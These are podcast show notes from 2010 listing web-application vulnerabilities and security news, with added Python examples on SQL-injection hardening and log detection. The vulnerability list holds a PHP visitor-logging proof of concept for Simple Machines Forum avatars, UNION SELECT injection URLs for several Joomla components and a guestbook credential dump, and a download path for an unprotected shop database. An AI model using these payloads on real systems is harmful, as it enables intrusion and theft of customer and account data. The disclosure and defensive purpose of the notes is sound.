ISD Podcast Episode 98 for March 30, 2010. This podcast is our contribution back to the community, where we discuss the vulnerabilities of interest and information security related news, hopefully providing you a few laughs and a little knowledge.
Announcements:
MyHardDriveDied.com:
- MHDD Data Recovery Class current dates and locations:
- Washington DC – April 12th to 16th
- San Diego – May 10th-14th
- San Francisco – June 14th -18th
- Atlanta – July 12th-16th
- Chicago – September 13th-17th
- Dallas, TX – October 11th-15th
- Washington DC – December 6th – 10th
- Cost is $3500 for all classes. To reserve and register, email smoulton@nicservices.com or go to http://www.myharddrivedied.com
SANS Community Atlanta:
- SANS Mgmt 512: Security Leadership Essentials for Managers with Knowledge Compression April 15 – 21, 2010 (http://www.sans.org/atlanta-security-leadership-2010-cs)
- SANS Security 566: Implementing and Auditing the Twenty Critical Security Controls – In Depth May 17 – 21, 2010 (http://www.sans.org/atlanta-critical-controls-2010-cs)
SANS Mentoring Program:
- Jason Lawrence will also be putting on the SANS Mentor Forensics 508 – Computer Forensics and Investigations course in Sandy Springs starting Tuesday, June 22, 2010 – Tuesday, August 24, 2010 (http://www.sans.org/mentor/details.php?nid=21538)
Notacon 7
- April 15th – 18th, 2010 Cleveland, Ohio
- http://notacon.org/
- Adrian will be there presenting on Anti-Forensics
Friends of the Podcast:
Webhosting services: WebSpeedway
Vulnerabilities of Interest:
- Simple Machines Forum Avatar is subject to a Remote PHP File vulnerability. Because the avatar can point at an externally hosted PHP file, that file is executed whenever any visitor of the forum loads a page that shows the avatar; the PHP file carries the malicious code, and the scope of the attack depends on what that file does. This impacts version 1.1.8, though others may be vulnerable as well. Proof of concept is available:
<?php
// PoC payload hosted on the attacker's server as the "avatar": it records
// details about every forum visitor whose browser requests it.
$ip = $_SERVER['REMOTE_ADDR'];
$so = $_SERVER['HTTP_USER_AGENT'];
$lan = $_SERVER['HTTP_ACCEPT_LANGUAGE'];
$url = $_SERVER['PHP_SELF'];
$path = $_SERVER['DOCUMENT_ROOT'];
$archivo = 'hacks.txt';
$fp = fopen($archivo, "a"); // append mode, so each visitor adds a record
$string = "
Simple Machines Forum <= 1.1.8 (avatar) rpfe PoC
by Jose Luis Gongora Fernandez (aka) JosS$path$url
VICTIM: $ip
info: $so
language: $lan";
$write = fputs($fp, $string);
fclose($fp);
?>
- Joomla Component dcsFlashGames is subject to a SQL Vulnerability because it fails to properly sanitize user supplied input in a SQL query. Version 2.0RC1 is impacted. Example URL is available: http://www.sample.com/index.php?option=com_dcs_flashgames&Itemid=kaMtiEz&;catid=[INDONESIANCODER]
- Joomla Component com_solution is subject to a SQL Vulnerability because it fails to properly sanitize user supplied input in a SQL query. Example URL is available: http://www.sample.com/index.php?option=com_solution&Itemid=5&task=contry&con=-1+UNION+SELECT+1,2,3,4,5,6,7,8–
- Joomla Component com_units is subject to a SQL Vulnerability because it fails to properly sanitize user supplied input in a SQL query. Example URL is available: http://www.sample.com/index.php?option=com_units&task=unit&id=-1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28–
- Joomla Component com_tariff is subject to a SQL Vulnerability because it fails to properly sanitize user supplied input in a SQL query. Example URL is available: http://www.sample.com/index.php?option=com_tariff&detail=-1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11
- Joomla Component com_agency is subject to a SQL Vulnerability because it fails to properly sanitize user supplied input in a SQL query. Example URL is available: http://www.sample.com/index.php?option=com_agency&task=view&aid=-1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14
- Joomla Component com_adds is subject to a Blind SQL Vulnerability because it fails to properly sanitize user supplied input in a SQL query. Example URL is available: http://www.sample.com/index.php?option=com_adds&action=view&catid=12+AND+1=0+UNION+SELECT+1,2–
- Joomla Component com_departments is subject to a SQL Vulnerability because it fails to properly sanitize user supplied input in a SQL query. Example URL is available: http://www.sample.com/index.php?option=com_departments&id=-1 UNION SELECT 1,2,3,4,5,6,7,8–
- Joomla Component com_business is subject to a SQL Vulnerability because it fails to properly sanitize user supplied input in a SQL query. Example URL is available: http://www.sample.com/index.php?option=com_business&view=business&region=37&category_id=-1 UNION SELECT 1,2,3–
- Joomla Component com_radio is subject to a SQL Vulnerability because it fails to properly sanitize user supplied input in a SQL query. Example URL is available: http://www.sample.com/index.php?option=com_radio&task=exibi_descricao&id=-1 UNION SELECT 1,2,3,4,5,6,7,8–
- Asp – comersus7F Shopping Cart Software is subject to a Backup Dump Vulnerability. By default, comersus.mdb isn’t password-protected and is served directly by the web server; it contains the order information (buyer’s address, phone, order status, tracking #, obs, etc), settings (encryption password, admin email, company information, etc) and shipment data. Exploit URL is available: http://www.sample.com/Comersus/database/comersus.mdb
- Powie’s PSCRIPT Gästebuch is subject to a SQL Injection Vulnerability. All versions earlier than 2.09 are impacted. Exploit URL is available: http://www.sample.com/gb/kommentar.php?id=99999+union+select+1,2,3,4,5,concat(nickname,0x3a,pwd,0x3a,email),7,8,9,10,11,12,13+from+pfuser+where+id=2
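The Joomla component entries above all share one root cause: a request parameter such as id, catid or aid is pasted into the SQL text, so a value shaped like -1 UNION SELECT 1,2 is parsed as SQL rather than treated as a number. The following Python/sqlite3 example is added here to show that pattern beside its hardened forms; it is not code from the podcast, from Joomla or from any of the listed components, and the units table, its rows and the function names are constructed for the demonstration.

```python
import sqlite3

# Payload shape taken from the Joomla entries above: the leading -1 empties the
# intended row lookup and the UNION appends an attacker-chosen SELECT.
UNION_PAYLOAD = "-1 UNION SELECT 1,2"


def build_db():
    """Constructed in-memory table standing in for a component's table
    (an assumption for the demo, not a real Joomla schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE units (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO units VALUES (?, ?)", [(1, "Unit A"), (2, "Unit B")])
    return conn


def lookup_unit_vulnerable(conn, raw_id):
    """The pattern behind the advisories: the raw parameter becomes SQL text."""
    sql = "SELECT id, name FROM units WHERE id = " + raw_id
    return conn.execute(sql).fetchall()


def lookup_unit_parameterized(conn, raw_id):
    """Hardened form: the value is bound as data, so SQL keywords inside it are inert."""
    return conn.execute("SELECT id, name FROM units WHERE id = ?", (raw_id,)).fetchall()


def lookup_unit_typed(conn, raw_id):
    """Defence in depth: enforce the expected type first (Joomla 1.5's
    JRequest::getInt plays this role), then bind. Non-numeric input is rejected."""
    try:
        unit_id = int(raw_id)
    except (TypeError, ValueError):
        return []
    return conn.execute("SELECT id, name FROM units WHERE id = ?", (unit_id,)).fetchall()


if __name__ == "__main__":
    db = build_db()
    print("vulnerable, normal input:", lookup_unit_vulnerable(db, "2"))
    print("vulnerable, payload:     ", lookup_unit_vulnerable(db, UNION_PAYLOAD))
    print("parameterized, payload:  ", lookup_unit_parameterized(db, UNION_PAYLOAD))
    print("typed, payload:          ", lookup_unit_typed(db, UNION_PAYLOAD))
```

With the vulnerable lookup the payload returns the attacker-chosen row (1, 2) instead of nothing, which is exactly the signal the "UNION SELECT 1,2,3,..." URLs above are probing for; the bound query returns no rows because the whole string is compared as a value, and the typed variant rejects it before any query runs. Binding is the fix; the type check is the extra layer that also stops the unsanitized value from reaching logs or error messages.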
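For anyone watching web-server logs for attempts against the exploit URLs listed in this episode, the following Python snippet is an added example, not from the podcast or any of the listed projects. It scans Common Log Format lines for UNION SELECT payloads in query strings, URL-decoding first and ignoring whitespace so the run-together UNIONSELECT spelling is still caught, and for successful direct downloads of .mdb database files like the Comersus comersus.mdb. The log lines, IP addresses and rule names are constructed for the demonstration.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (Common Log Format); not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [30/Mar/2010:10:01:02 +0000] "GET /index.php?option=com_units&task=unit&id=7 HTTP/1.1" 200 5123
203.0.113.9 - - [30/Mar/2010:10:01:05 +0000] "GET /index.php?option=com_units&task=unit&id=-1%20UNION%20SELECT%201,2,3 HTTP/1.1" 200 812
203.0.113.9 - - [30/Mar/2010:10:01:07 +0000] "GET /index.php?option=com_adds&action=view&catid=12+AND+1=0+UNION+SELECT+1,2-- HTTP/1.1" 200 790
198.51.100.2 - - [30/Mar/2010:10:02:11 +0000] "GET /Comersus/database/comersus.mdb HTTP/1.1" 200 2097152
198.51.100.2 - - [30/Mar/2010:10:02:15 +0000] "GET /gb/kommentar.php?id=99999+union+select+1,2,3+from+pfuser HTTP/1.1" 200 640
192.0.2.4 - - [30/Mar/2010:10:03:00 +0000] "GET /images/unionselect.png HTTP/1.1" 200 3321
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)
# \s* rather than \s+ so that "UNIONSELECT" (seen in the com_units/com_agency URLs) still matches.
UNION_SELECT_RE = re.compile(r"union\s*(?:all\s+)?select", re.IGNORECASE)
DB_FILE_RE = re.compile(r"\.mdb$", re.IGNORECASE)


def parse_line(line):
    """Split one log line into the fields the rules need; None if it is not CLF."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path, _, query = m.group("target").partition("?")
    return {
        "ip": m.group("ip"),
        "path": path,
        "query": unquote_plus(query),  # decode %20 and + before matching
        "status": int(m.group("status")),
    }


def classify(record):
    """Return the rule names that fire for one parsed request."""
    findings = []
    # Only the query string is inspected, so a path like /images/unionselect.png is not flagged.
    if UNION_SELECT_RE.search(record["query"]):
        findings.append("sqli-union")
    # A 200 for the raw .mdb means the database was actually handed out.
    if DB_FILE_RE.search(record["path"]) and record["status"] == 200:
        findings.append("db-file-download")
    return findings


def scan(log_text):
    """Scan a block of log text; returns (client ip, rule, path) per finding."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        for rule in classify(rec):
            hits.append((rec["ip"], rule, rec["path"]))
    return hits


if __name__ == "__main__":
    for ip, rule, path in scan(SAMPLE_LOG):
        print(f"{rule:18} {ip:14} {path}")
```

Two design points matter in practice: decode before matching, or the "+" and "%20" variants slip past a naive substring search, and restrict the UNION rule to the query string so ordinary file names do not generate noise. The .mdb rule keys on the 200 status because a 403 or 404 for the same path is a probe, not a data loss, and deserves a different severity.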
Stories of Interest:
News item 1: http://www.theregister.co.uk/2010/03/29/ie_emergency_fix/
Microsoft has announced plans to release an out-of-sequence patch, designed to resolve a zero-day vulnerability in Internet Explorer.
A cumulative update to Internet Explorer (MS10-018) plugs a security hole in IE 6 and IE 7 that has been exploited by hackers over recent weeks. The latest version of Microsoft’s browser – IE 8 – is not vulnerable to the flaw, which Microsoft first acknowledged was a problem on 9 March.
The vulnerability involves a flaw in the iepeers.dll library in the handling of invalid values passed to the “setAttribute()” function. Exploits create a means to drop malware onto the PCs of victims, providing they visit a booby-trapped website using a vulnerable version of IE.
News item 2: http://www.computerworld.com/s/article/9174337/Apple_delivers_record_monster_security_update?taxonomyId=17
Apple today patched 92 vulnerabilities, a third of them critical, in a record update to its Leopard and Snow Leopard operating systems.
Security Update 2010-002 plugged 92 holes in the client and server editions of Mac OS X 10.5 and Mac OS X 10.6, breaking a record that has stood since March 2008. The update dwarfed any released last year, when Apple’s largest patched 67 vulnerabilities.
Today’s security roll-up fixed flaws in 42 different applications or operating system components in Mac OS X, from AppKit and Application Firewall to unzip and X11, the Mac’s version of the X Window System.
News item 3: http://fcw.com/articles/2010/03/23/web-fose-bratton-lapd-cyber.aspx
Local police departments have the knowledge but lack the resources for cybersecurity-related police efforts, according to former Los Angeles Police Department Chief Bill Bratton.
Delivering the keynote address at the FOSE 2010 trade show in Washington, Bratton said local police departments have been behind the curve for most of their history in tackling computer-related crime and cybersecurity.
Bratton, who also served as commissioner of the New York City Police Department, said that computer security is an unmet challenge for police departments that is unlikely to be addressed in a significant way because of funding, prioritization, resources and access to systems.
He added that the situation is frustrating for police chiefs. “We know how to do it; we know how to coordinate it,” he said. “It’s a resource issue.” Bratton is now chairman of Altegrity Risk International. He also previously served as chief of the New York City Transit Police and as Boston Police Department commissioner.
News item 4: http://www.ottawacitizen.com/technology/Canada+easy+prey+cyber+attacker+expert/2718450/story.html
Canada is woefully unprepared for a massive cyber-attack that is within the capabilities of any run-of-the-mill hacker, and which could cripple the business of the nation, warns a leading security expert.
Dragos Ruiu, an Edmonton-based computer security consultant, says it’s time for the government to protect complex computer networks that can now be hijacked with the simplest of tools.
“There has got to be a lot more thought and a lot more talk and a lot more brains applied to the situation,” said Ruiu. “The cyber-warfare world is the only place a 17-year-old kid can take on a nation-state and win.”
Ruiu, a key organizer of the CanSecWest Applied Security Conference in Vancouver, said that when it comes to computer security, even the popular pocket-sized smartphones are open to attack. He said this year’s conference will play host to a hacking contest to see which cellphone is the most secure.
News item 5: http://news.bbc.co.uk/2/hi/europe/8586269.stm
A Frenchman who police say hacked Twitter accounts belonging to US President Barack Obama and celebrities could face jail. The unemployed 25-year-old was arrested on Tuesday after an operation lasting several months, conducted by French police with agents from the FBI. The 25-year-old is said to have hacked into the micro-blogging website, by simply guessing users’ passwords.
The suspect reportedly targeted other celebrities, including Britney Spears. After being questioned by police, he was ordered to appear at court in the central French city of Clermont-Ferrand on 24 June.